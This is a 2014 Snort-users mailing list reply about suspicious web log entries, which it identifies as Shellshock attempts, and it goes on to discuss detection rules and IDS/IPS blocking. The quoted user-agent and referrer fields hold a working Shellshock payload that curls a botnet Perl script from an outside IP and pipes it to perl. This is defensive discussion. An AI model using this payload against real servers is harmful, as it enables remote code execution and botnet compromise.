Snort mailing list archives
Re: Odd http requests in the logs
From: waldo kitty <wkitty42 () windstream net>
Date: Mon, 03 Nov 2014 14:15:21 -0500
On 11/2/2014 11:23 PM, Richard Geddes wrote:
Hello, I received a few (9) events in my web logs with the following fields: agent : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl" referrer : "() { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl"
these are shellshock attempts... they are trying to use a macro hole in the bash command interpreter...
downloaded index.png, and it turns out to be a base64 encoded perl script that has comments about a botnet. It seems to target apache.
yes, that script is a "2nd phase" that's only operational if the shellshock bypass attempts works... it also requires curl and perl to be installed and operational... curl for the retrieval and perl for the botnet script execution...
I'm using snort with snort VRT Rules on a pfsense firewall, and pfsense, snort, and the snort rules are up-to-date
do you have the shellshock detection rules enabled?
snort seems to be passing these requests on to my web server, and it seems to me they should be blocked.
does the pfsense installation of snort operate as IDS (intrusion detection system) or IPS (intrusion protection system)? in either case, if the rules are not enabled to detect this problem, snort won't react to traffic that matches...
I don't know enough about how web servers and log handlers process this data to determine if it's a threat.
the way it works is if those fields are processed by a bash CLI session... they create a macro that bash doesn't properly handle and it executes the commands after the semi-colon ";"... that's the bug... bash should stop processing the macro when it sees the semi-colon... if you are running a *nix OS, you should have already gotten several security updates fixing this problem...
Is there a way to tell snort to block http requests with these fields? The source of the malicious file should probably be regex'd in case there are alternate sources of this file.
blocking depends on your installation and its capabilities... -- NOTE: No off-list assistance is given without prior approval. Please *keep mailing list traffic on the list* unless private contact is specifically requested and granted. ------------------------------------------------------------------------------ _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://sourceforge.net/mailarchive/forum.php?forum_name=snort-users Please visit http://blog.snort.org to stay current on all the latest Snort news!
Current thread:
- Odd http requests in the logs Richard Geddes (Nov 02)
- Re: Odd http requests in the logs waldo kitty (Nov 03)